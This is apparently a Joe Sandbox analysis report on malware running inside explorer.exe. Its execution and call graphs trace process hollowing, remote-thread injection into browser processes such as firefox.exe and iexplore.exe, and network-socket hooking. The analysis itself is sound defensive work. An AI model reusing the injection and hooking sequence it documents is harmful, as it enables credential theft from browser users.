                                                      Function 000832F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                                      • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: POST
                                                      • API String ID: 3168844106-1814004025
                                                      • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                      • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                                      • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                      • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:3
                                                      execution_graph 1555 6d637 1556 6d62e 1555->1556 1558 6d6f8 1556->1558 1559 6d748 1556->1559 1561 6d74d 1559->1561 1560 6d835 LoadLibraryA 1560->1561 1561->1560 1563 6d884 VirtualProtect VirtualProtect 1561->1563 1565 6d879 1561->1565 1564 6d912 1563->1564 1564->1564 1565->1558 1566 6d5da 1567 6d614 1566->1567 1568 6d748 3 API calls 1567->1568 1569 6d6f8 1567->1569 1568->1569 1548 6d748 1550 6d74d 1548->1550 1549 6d835 LoadLibraryA 1549->1550 1550->1549 1552 6d884 VirtualProtect VirtualProtect 1550->1552 1554 6d879 1550->1554 1553 6d912 1552->1553 1553->1553

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00061A04 1 Function_00065104 1->0 4 Function_00062C00 1->4 26 Function_00063F20 1->26 30 Function_00061C28 1->30 36 Function_00061938 1->36 37 Function_00061838 1->37 39 Function_00064C40 1->39 60 Function_00061B74 1->60 67 Function_00061C80 1->67 87 Function_00061CA0 1->87 105 Function_00061BC8 1->105 116 Function_00061BE8 1->116 2 Function_00061405 3 Function_00065300 3->1 3->3 3->37 70 Function_00064C80 3->70 3->116 12 Function_00062B14 4->12 104 Function_000629C0 4->104 4->116 5 Function_00061000 6 Function_0006370C 6->0 7 Function_0006CC0D 8 Function_0006D70A 9 Function_00061D08 110 Function_00061CD0 9->110 10 Function_00061508 11 Function_0006D416 13 Function_00062214 13->37 14 Function_00064A14 15 Function_00064C14 16 Function_00064914 16->9 16->37 55 Function_00061860 16->55 92 Function_00061EB4 16->92 17 Function_00064710 17->0 78 Function_00064094 17->78 103 Function_00063FC0 17->103 109 Function_000618D0 17->109 17->116 117 Function_000618E8 17->117 119 Function_00063CF0 17->119 123 Function_00063FF8 17->123 18 Function_00062F10 18->37 19 Function_00064B1E 20 Function_0006311C 21 Function_0006211C 22 Function_0006141D 23 Function_00063818 23->0 23->6 23->37 23->55 82 Function_00063690 23->82 23->109 113 Function_000621E4 23->113 23->117 24 Function_00063424 25 Function_00061822 42 Function_00063E4C 26->42 27 Function_00064B2E 28 Function_00064C2E 29 Function_0006D42D 31 Function_0006D637 43 Function_0006D748 31->43 32 Function_00063C3C 45 Function_00063B48 32->45 49 Function_0006345C 32->49 32->117 33 Function_0006343C 34 Function_00064A38 34->9 34->37 34->92 35 Function_00062838 38 Function_00064C42 39->9 39->16 39->34 39->37 39->92 97 Function_00064ABC 39->97 40 Function_00064540 68 Function_00064280 40->68 40->103 40->116 41 Function_0006624F 42->37 42->55 43->8 44 Function_00063048 44->37 45->18 63 Function_0006317C 45->63 46 Function_00061254 47 Function_00062754 48 Function_00064B5E 49->37 75 Function_0006188C 49->75 49->116 50 Function_00064C5C 51 Function_00062964 83 Function_0006299C 51->83 52 Function_0006CD63 53 Function_00063F60 53->13 53->55 72 Function_0006268C 53->72 53->117 54 Function_00061560 55->116 56 Function_00064B6F 57 Function_0006156C 58 Function_00062368 58->36 58->37 58->55 58->75 85 Function_00062298 58->85 58->109 122 Function_000618F8 58->122 59 Function_00061576 61 Function_0006D57E 62 Function_0006497F 63->20 63->44 63->55 79 Function_00063094 63->79 63->109 64 Function_0006277C 64->47 64->51 64->109 65 Function_00064A7C 66 Function_00062F84 68->0 68->37 68->55 69 Function_00064680 69->68 69->103 69->116 70->21 70->37 70->55 70->64 74 Function_00061A8C 70->74 84 Function_00063D9C 70->84 108 Function_000628D4 70->108 70->116 71 Function_0006628F 72->37 72->55 72->58 73 Function_00061D8C 75->37 76 Function_00063B8C 76->0 76->45 76->49 76->117 77 Function_00062F88 78->0 78->37 78->55 78->123 79->37 79->55 79->77 80 Function_0006CD92 81 Function_00063A90 81->13 81->55 81->72 81->117 82->0 86 Function_000644A4 86->78 86->103 86->119 88 Function_00064BA0 89 Function_00063CAC 89->49 90 Function_00064AA9 91 Function_0006CFB7 92->37 92->55 92->73 94 Function_00061DB0 92->94 93 Function_000614B2 94->37 94->55 94->73 94->92 95 Function_00061FB0 96 Function_00064BB0 97->9 97->37 107 Function_00061FD4 97->107 98 Function_0006D0BB 99 Function_00064BB8 100 Function_000649C6 101 Function_0006D4C4 102 Function_0006D0C3 106 Function_000614D4 107->37 107->55 107->95 107->107 108->35 108->47 108->116 111 Function_000672D0 112 Function_0006D5DA 112->43 114 Function_0006CCE2 115 Function_000645E0 115->68 115->103 115->116 118 Function_00063AF0 118->23 120 Function_000635FC 118->120 119->24 119->32 119->33 119->76 119->89 119->116 119->118 120->55 120->116 121 Function_000649FA 123->0 124 Function_000614F9

                                                      Executed Functions

                                                      Function 00065300 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 104 65300-65310 call 61be8 107 65312-65345 call 61838 104->107 108 65390-65395 104->108 112 65347 call 61838 107->112 113 65371-6538a NtUnmapViewOfSection 107->113 119 6534c-65365 112->119 115 6539c-653ab call 65104 113->115 116 6538c-6538e 113->116 123 653b5-653be 115->123 124 653ad-653b0 call 65300 115->124 116->108 117 65396-6539b call 64c80 116->117 117->115 119->113 124->123
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 00065378
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                      • Instruction ID: a41e593be866e3ab021910bfc825c372ad5ca9bfff955d7c7ff76e928a4655b8
                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                      • Instruction Fuzzy Hash: 5311C630601D094FEB9DFBB998992B933D6EB14312F54053AE415C73A2EE698B808340
                                                      Function 00065104 Relevance: 10.7, APIs: 7, Instructions: 168processstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00061B74: OpenFileMappingA.KERNEL32 ref: 00061B8B
                                                        • Part of subcall function 00061B74: MapViewOfFile.KERNEL32 ref: 00061BAA
                                                      • SysFreeMap.PGOCR ref: 000651A9
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000651B3
                                                      • Process32First.KERNEL32 ref: 000651D6
                                                      • lstrcmpi.KERNEL32 ref: 000651F1
                                                      • Process32Next.KERNEL32 ref: 000652D9
                                                      • CloseHandle.KERNELBASE ref: 000652EA
                                                      • SleepEx.KERNEL32 ref: 000652F5
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3402289966-0
                                                      • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                      • Instruction ID: a6da5bda8c7869cbd6e8df023e30412e059deaad76ffb23e04c0e8a9e63b4105
                                                      • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                      • Instruction Fuzzy Hash: 08515730204E098FDB59EF68DCA5AE973E3FB95301F444619E457C71A2DF78DA058781
                                                      Function 0006D748 Relevance: 4.7, APIs: 3, Instructions: 246memorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 48 6d748-6d74b 49 6d755-6d759 48->49 50 6d765 49->50 51 6d75b-6d763 49->51 52 6d767 50->52 53 6d74d-6d753 50->53 51->50 54 6d76a-6d771 52->54 53->49 56 6d773-6d77b 54->56 57 6d77d 54->57 56->57 57->54 58 6d77f-6d782 57->58 59 6d797-6d7a4 58->59 60 6d784-6d792 58->60 72 6d7a6-6d7a8 59->72 73 6d7be-6d7cc call 6d70a 59->73 61 6d794-6d795 60->61 62 6d7ce-6d7e9 60->62 61->59 63 6d81a-6d81d 62->63 65 6d822-6d829 63->65 66 6d81f-6d820 63->66 68 6d82f-6d833 65->68 67 6d801-6d805 66->67 70 6d807-6d80a 67->70 71 6d7eb-6d7ee 67->71 74 6d884-6d88d 68->74 75 6d835-6d84e LoadLibraryA 68->75 70->65 76 6d80c-6d810 70->76 71->65 80 6d7f0 71->80 77 6d7ab-6d7b2 72->77 73->49 81 6d890-6d899 74->81 79 6d84f-6d856 75->79 84 6d812-6d819 76->84 85 6d7f1-6d7f5 76->85 93 6d7b4-6d7ba 77->93 94 6d7bc 77->94 79->68 87 6d858-6d86e 79->87 80->85 82 6d8be-6d90e VirtualProtect * 2 81->82 83 6d89b-6d89d 81->83 91 6d912-6d917 82->91 88 6d8b0-6d8bc 83->88 89 6d89f-6d8ae 83->89 84->63 85->67 92 6d7f7-6d7f9 85->92 99 6d870-6d877 87->99 100 6d879-6d883 87->100 88->89 89->81 91->91 95 6d919-6d928 91->95 92->67 97 6d7fb-6d7ff 92->97 93->94 94->73 94->77 97->67 97->70 99->79
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0006D847
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006D8E5
                                                      • VirtualProtect.KERNELBASE ref: 0006D903
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.000000000006C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_6c000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                      • Instruction ID: fb22e33ff937d24d93fb2efd063ba145730d0834d4eb26fcdd67a2d867c28293
                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                      • Instruction Fuzzy Hash: 23515A32B5891D4FCB24AA3C9CC87F9B7D2F755325B58063BC49AC3285EE58D84683C2
                                                      Function 00061B74 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 101 61b74-61b94 OpenFileMappingA 102 61b96-61bb4 MapViewOfFile 101->102 103 61bb7-61bc4 101->103 102->103
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                      • Instruction ID: ddaee3d7e8f9e73a22afb263a5f2562a7b1b5803ba9d96df92eae33d24df65e4
                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                      • Instruction Fuzzy Hash: A5F01C35318F094FAB44EF7C9C8C576B7E1EBA8202B048A7EA95AC7165EF74C8818751

                                                      Execution Graph

                                                      Execution Coverage:10.3%
                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:306
                                                      Total number of Limit Nodes:42
                                                      execution_graph 985 c245e lstrlen 986 c24a5 985->986 987 c2476 CryptBinaryToStringA 985->987 987->986 988 c2489 987->988 991 c2861 GetProcessHeap RtlAllocateHeap 988->991 990 c2494 CryptBinaryToStringA 990->986 991->990 707 c7728 708 c774b 707->708 713 c7904 707->713 709 c789f VirtualProtect VirtualProtect 708->709 710 c785a LoadLibraryA 708->710 709->713 715 c7871 710->715 712 c7883 GetProcAddress 714 c7899 712->714 712->715 715->708 715->712 998 c1425 999 c144b 998->999 1000 c1432 998->1000 1001 c2608 VirtualQuery 1000->1001 1002 c143a 1001->1002 1002->999 1003 c1493 23 API calls 1002->1003 1003->999 1004 c2806 VirtualFree 1005 c1eb6 1006 c1ecc lstrlen 1005->1006 1007 c1ed9 1005->1007 1006->1007 1016 c2861 GetProcessHeap RtlAllocateHeap 1007->1016 1009 c1ee1 lstrcat 1010 c1f1d 1009->1010 1011 c1f16 lstrcat 1009->1011 1017 c1f4a 1010->1017 1011->1010 1014 c2843 3 API calls 1015 c1f40 1014->1015 1016->1009 1051 c22b8 1017->1051 1021 c1f77 1056 c27e2 lstrlen MultiByteToWideChar 1021->1056 1023 c1f86 1057 c2374 RtlZeroMemory 1023->1057 1026 c1fd8 RtlZeroMemory 1028 c200d 1026->1028 1027 c2843 3 API calls 1029 c1f2d 1027->1029 1032 c229a 1028->1032 1034 c203b 1028->1034 1059 c22e5 1028->1059 1029->1014 1031 c2280 1031->1032 1033 c2843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 1068 c2861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 c210b wsprintfW 1037 c2131 1036->1037 1041 c219e 1037->1041 1069 c2861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 c216b wsprintfW 1039->1041 1040 c225d 1042 c2843 3 API calls 1040->1042 1041->1040 1070 c2861 GetProcessHeap RtlAllocateHeap 1041->1070 1044 c2271 1042->1044 1044->1031 1045 c2843 3 API calls 1044->1045 1045->1031 1046 c21e9 1047 c2256 1046->1047 1071 c2815 VirtualAlloc 1046->1071 1049 c2843 3 API calls 1047->1049 1049->1040 1050 c2243 RtlMoveMemory 1050->1047 1052 c1f69 1051->1052 1053 c22c2 1051->1053 1055 c2861 GetProcessHeap RtlAllocateHeap 1052->1055 1054 c26e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 c1f96 1057->1058 1058->1026 1058->1032 1060 c2353 1059->1060 1062 c22f2 1059->1062 1060->1034 1061 c22f6 DnsQuery_W 1061->1062 1062->1060 1062->1061 1063 c2335 DnsFree inet_ntoa 1062->1063 1063->1062 1064 c2355 1063->1064 1072 c2861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 c235f 1073 c27e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1060 716 c1000 717 c1007 716->717 718 c1010 716->718 720 c1016 717->720 769 c2608 VirtualQuery 720->769 723 c1097 723->718 725 c102c RtlMoveMemory 726 c104d 725->726 727 c1071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 c2861 GetProcessHeap RtlAllocateHeap 726->806 729 c109e 727->729 730 c1092 727->730 772 c10a4 729->772 730->723 732 c1095 730->732 731 c1052 RtlMoveMemory 731->727 807 c1332 732->807 734 c10a3 736 c2861 GetProcessHeap RtlAllocateHeap 734->736 737 c10cc 736->737 738 c10dc CreateToolhelp32Snapshot 737->738 739 c10f0 Process32First 738->739 740 c1322 Sleep 738->740 741 c110c lstrcmpi 739->741 742 c131b CloseHandle 739->742 740->738 743 c1124 lstrcmpi 741->743 766 c1280 741->766 742->740 744 c1138 lstrcmpi 743->744 743->766 746 c114c lstrcmpi 744->746 744->766 745 c25ad OpenProcess IsWow64Process IsWow64Process CloseHandle 745->766 747 c1160 lstrcmpi 746->747 746->766 749 c1170 lstrcmpi 747->749 747->766 748 c1305 Process32Next 748->741 750 c1319 748->750 751 c1184 lstrcmpi 749->751 749->766 750->742 752 c1198 lstrcmpi 751->752 751->766 753 c11ac lstrcmpi 752->753 752->766 754 c11c0 lstrcmpi 753->754 753->766 755 c11d4 lstrcmpi 754->755 754->766 756 c11e8 lstrcmpi 755->756 755->766 758 c11fc lstrcmpi 756->758 756->766 757 c2608 VirtualQuery 757->766 760 c120c lstrcmpi 758->760 758->766 759 c12ae lstrcmpi 759->766 761 c121c lstrcmpi 760->761 760->766 762 c122c lstrcmpi 761->762 761->766 763 c123c lstrcmpi 762->763 762->766 765 c124c lstrcmpi 763->765 763->766 764 c1819 30 API calls 764->766 765->766 767 c125c lstrcmpi 765->767 766->745 766->748 766->757 766->759 766->764 767->766 768 c126c lstrcmpi 767->768 768->748 768->766 770 c101e 769->770 770->723 771 c2861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 c2861 GetProcessHeap RtlAllocateHeap 772->834 774 c10cc 775 c10dc CreateToolhelp32Snapshot 774->775 776 c10f0 Process32First 775->776 777 c1322 Sleep 775->777 778 c110c lstrcmpi 776->778 779 c131b CloseHandle 776->779 777->775 780 c1124 lstrcmpi 778->780 781 c1280 778->781 779->777 780->781 782 c1138 lstrcmpi 780->782 786 c1305 Process32Next 781->786 795 c2608 VirtualQuery 781->795 797 c12ae lstrcmpi 781->797 835 c25ad OpenProcess 781->835 841 c1819 781->841 782->781 784 c114c lstrcmpi 782->784 784->781 785 c1160 lstrcmpi 784->785 785->781 787 c1170 lstrcmpi 785->787 786->778 788 c1319 786->788 787->781 789 c1184 lstrcmpi 787->789 788->779 789->781 790 c1198 lstrcmpi 789->790 790->781 791 c11ac lstrcmpi 790->791 791->781 792 c11c0 lstrcmpi 791->792 792->781 793 c11d4 lstrcmpi 792->793 793->781 794 c11e8 lstrcmpi 793->794 794->781 796 c11fc lstrcmpi 794->796 795->781 796->781 798 c120c lstrcmpi 796->798 797->781 798->781 799 c121c lstrcmpi 798->799 799->781 800 c122c lstrcmpi 799->800 800->781 801 c123c lstrcmpi 800->801 801->781 803 c124c lstrcmpi 801->803 803->781 804 c125c lstrcmpi 803->804 804->781 805 c126c lstrcmpi 804->805 805->781 805->786 806->731 887 c2861 GetProcessHeap RtlAllocateHeap 807->887 809 c1340 GetModuleFileNameA 888 c2861 GetProcessHeap RtlAllocateHeap 809->888 811 c1357 GetCurrentProcessId wsprintfA 889 c263e CryptAcquireContextA 811->889 814 c139c Sleep 894 c24d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 c140d 912 c2843 815->912 819 c13ae GetModuleHandleA GetProcAddress 821 c13c9 819->821 822 c13da GetModuleHandleA GetProcAddress 819->822 820 c2843 3 API calls 825 c141b RtlExitUserThread 820->825 902 c1de3 821->902 823 c13f5 822->823 824 c1406 822->824 827 c1de3 3 API calls 823->827 828 c24d5 10 API calls 824->828 829 c1425 825->829 827->824 828->815 830 c144b 829->830 831 c2608 VirtualQuery 829->831 830->729 832 c143a 831->832 832->830 917 c1493 832->917 834->774 836 c25cb IsWow64Process 835->836 837 c2600 835->837 838 c25dc IsWow64Process 836->838 839 c25ee 836->839 837->781 838->839 840 c25f9 CloseHandle 838->840 839->840 840->837 842 c2608 VirtualQuery 841->842 843 c1833 842->843 844 c1845 OpenProcess 843->844 845 c1a76 843->845 844->845 846 c185e 844->846 845->781 847 c2608 VirtualQuery 846->847 848 c1865 847->848 848->845 849 c188f 848->849 850 c1873 NtSetInformationProcess 848->850 872 c1a80 849->872 850->849 853 c1a80 2 API calls 854 c18d6 853->854 855 c1a73 CloseHandle 854->855 856 c1a80 2 API calls 854->856 855->845 857 c1900 856->857 878 c1b17 857->878 860 c1a80 2 API calls 861 c1930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 c1a4e CreateRemoteThread 861->862 866 c1985 861->866 863 c1a65 CloseHandle 862->863 865 c1a67 CloseHandle CloseHandle 863->865 864 c198b CreateMutexA GetLastError 864->866 867 c19a7 CloseHandle Sleep 864->867 865->855 866->864 868 c19bb GetModuleHandleA GetProcAddress ReadProcessMemory 866->868 867->864 869 c19ec WriteProcessMemory 868->869 870 c1a47 868->870 869->870 871 c1a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->863 870->865 871->870 873 c1a94 872->873 876 c18b4 872->876 874 c1aa4 NtCreateSection 873->874 875 c1ac3 873->875 874->875 875->876 877 c1ad8 NtMapViewOfSection 875->877 876->853 877->876 879 c1b2e 878->879 885 c1b60 878->885 880 c1b30 RtlMoveMemory 879->880 880->880 880->885 881 c1bc3 882 c1910 NtUnmapViewOfSection 881->882 884 c1be1 LdrProcessRelocationBlock 881->884 882->860 883 c1b71 LoadLibraryA 883->882 883->885 884->881 884->882 885->881 885->883 886 c1ba1 GetProcAddress 885->886 886->882 886->885 887->809 888->811 890 c1384 CreateMutexA GetLastError 889->890 891 c2664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 c26aa wsprintfA 891->892 892->892 893 c26cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 c2515 894->895 896 c2565 CloseHandle 895->896 897 c2555 Thread32Next 895->897 898 c2521 OpenThread 895->898 896->819 897->895 899 c253c SuspendThread 898->899 900 c2544 ResumeThread 898->900 901 c254a CloseHandle 899->901 900->901 901->897 903 c1e56 902->903 904 c1ded 902->904 903->822 904->903 944 c1e93 VirtualProtect 904->944 906 c1e04 906->903 945 c2815 VirtualAlloc 906->945 908 c1e10 909 c1e1a RtlMoveMemory 908->909 910 c1e2d 908->910 909->910 946 c1e93 VirtualProtect 910->946 913 c2608 VirtualQuery 912->913 914 c284b 913->914 915 c1414 914->915 916 c284f GetProcessHeap HeapFree 914->916 915->820 916->915 918 c14c0 917->918 919 c14a1 917->919 920 c14c8 918->920 921 c1510 918->921 947 c17c7 919->947 924 c17c7 5 API calls 920->924 941 c14b6 920->941 966 c26e6 lstrlen lstrlen 921->966 926 c14e0 924->926 926->941 954 c1647 926->954 927 c155f 928 c26e6 2 API calls 927->928 930 c156c 928->930 934 c1584 930->934 935 c15a0 930->935 930->941 931 c1532 968 c1752 GetModuleHandleA GetProcAddress 931->968 971 c2404 lstrlen 934->971 937 c2404 5 API calls 935->937 935->941 940 c15ac 937->940 938 c1647 11 API calls 938->941 940->941 942 c1647 11 API calls 940->942 941->830 943 c14fb 942->943 943->941 977 c15e0 943->977 944->906 945->908 946->903 948 c17d1 947->948 949 c1812 947->949 948->949 950 c26e6 2 API calls 948->950 949->941 951 c17f1 950->951 951->949 982 c2861 GetProcessHeap RtlAllocateHeap 951->982 953 c1804 RtlMoveMemory 953->949 955 c1745 954->955 956 c1660 954->956 955->943 956->955 957 c1671 lstrlen 956->957 957->955 958 c1683 lstrlen 957->958 958->955 959 c1690 getpeername 958->959 959->955 960 c16ae inet_ntoa htons 959->960 960->955 962 c16cc 960->962 962->955 983 c2861 GetProcessHeap RtlAllocateHeap 962->983 963 c1717 wsprintfA 964 c173a 963->964 964->955 965 c2843 3 API calls 964->965 965->955 967 c151d 966->967 967->927 967->931 969 c1776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->969 970 c1539 968->970 969->970 970->938 970->941 972 c241c CryptStringToBinaryA 971->972 973 c2456 971->973 972->973 974 c2438 972->974 973->941 984 c2861 GetProcessHeap RtlAllocateHeap 974->984 976 c2444 CryptStringToBinaryA 976->973 978 c2843 3 API calls 977->978 979 c15f5 978->979 980 c2843 3 API calls 979->980 981 c15fc 980->981 981->941 982->953 983->963 984->976

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_000C2608 1 Function_000C1F4A 11 Function_000C2843 1->11 17 Function_000C2815 1->17 31 Function_000C22E5 1->31 34 Function_000C2861 1->34 35 Function_000C27E2 1->35 38 Function_000C22B8 1->38 39 Function_000C2374 1->39 41 Function_000C2731 1->41 2 Function_000C2404 2->34 3 Function_000C2806 4 Function_000C1647 4->11 26 Function_000C24AE 4->26 4->34 5 Function_000C17C7 32 Function_000C26E6 5->32 5->34 6 Function_000C1A80 7 Function_000C1DC0 15 Function_000C1C19 7->15 8 Function_000C1D80 8->15 9 Function_000C1000 18 Function_000C1016 9->18 10 Function_000C2841 11->0 12 Function_000C1E5D 12->8 13 Function_000C245E 13->34 14 Function_000C1819 14->0 14->6 19 Function_000C1B17 14->19 16 Function_000C24D5 18->0 18->14 21 Function_000C2592 18->21 25 Function_000C25AD 18->25 29 Function_000C10A4 18->29 18->34 18->41 42 Function_000C1332 18->42 43 Function_000C2573 18->43 20 Function_000C3417 22 Function_000C1752 23 Function_000C1493 23->2 23->4 23->5 23->22 23->32 33 Function_000C15E0 23->33 24 Function_000C1E93 27 Function_000C7728 28 Function_000C1469 28->0 28->23 29->0 29->14 29->21 29->25 29->34 29->41 29->43 30 Function_000C1425 30->0 30->23 31->34 31->35 33->11 36 Function_000C1DE3 36->7 36->12 36->17 36->24 37 Function_000C263E 38->32 40 Function_000C1EB6 40->1 40->11 40->34 42->0 42->11 42->16 42->23 42->34 42->36 42->37

                                                      Executed Functions

                                                      Function 000C1016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244stringsleepprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 c1016-c1020 call c2608 3 c1097-c1098 0->3 4 c1022-c104b call c2861 RtlMoveMemory 0->4 7 c104d-c106b call c2861 RtlMoveMemory 4->7 8 c1071-c1090 NtUnmapViewOfSection GetCurrentProcessId 4->8 7->8 10 c109e-c10d7 call c10a4 call c2861 8->10 11 c1092-c1093 8->11 21 c10dc-c10ea CreateToolhelp32Snapshot 10->21 11->3 13 c1095-c1099 call c1332 11->13 13->10 22 c10f0-c1106 Process32First 21->22 23 c1322-c132d Sleep 21->23 24 c110c-c111e lstrcmpi 22->24 25 c131b-c131c CloseHandle 22->25 23->21 26 c1124-c1132 lstrcmpi 24->26 27 c1280-c1289 call c25ad 24->27 25->23 26->27 28 c1138-c1146 lstrcmpi 26->28 33 c128b-c1294 call c2592 27->33 34 c1305-c1313 Process32Next 27->34 28->27 30 c114c-c115a lstrcmpi 28->30 30->27 32 c1160-c116a lstrcmpi 30->32 32->27 35 c1170-c117e lstrcmpi 32->35 33->34 41 c1296-c129d call c2573 33->41 34->24 36 c1319 34->36 35->27 38 c1184-c1192 lstrcmpi 35->38 36->25 38->27 40 c1198-c11a6 lstrcmpi 38->40 40->27 42 c11ac-c11ba lstrcmpi 40->42 41->34 47 c129f-c12ac call c2608 41->47 42->27 44 c11c0-c11ce lstrcmpi 42->44 44->27 46 c11d4-c11e2 lstrcmpi 44->46 46->27 48 c11e8-c11f6 lstrcmpi 46->48 47->34 52 c12ae-c1300 lstrcmpi call c2731 call c1819 call c2731 47->52 48->27 51 c11fc-c120a lstrcmpi 48->51 51->27 53 c120c-c121a lstrcmpi 51->53 52->34 53->27 55 c121c-c122a lstrcmpi 53->55 55->27 56 c122c-c123a lstrcmpi 55->56 56->27 58 c123c-c124a lstrcmpi 56->58 58->27 60 c124c-c125a lstrcmpi 58->60 60->27 62 c125c-c126a lstrcmpi 60->62 62->27 64 c126c-c127a lstrcmpi 62->64 64->27 64->34
                                                      APIs
                                                        • Part of subcall function 000C2608: VirtualQuery.KERNEL32(000C4434,?,0000001C), ref: 000C2615
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C1038
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C106B
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 000C1074
                                                      • GetCurrentProcessId.KERNEL32(?,000C1010), ref: 000C107A
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C10DF
                                                      • Process32First.KERNEL32(00000000,?), ref: 000C10FE
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 000C111A
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 000C112E
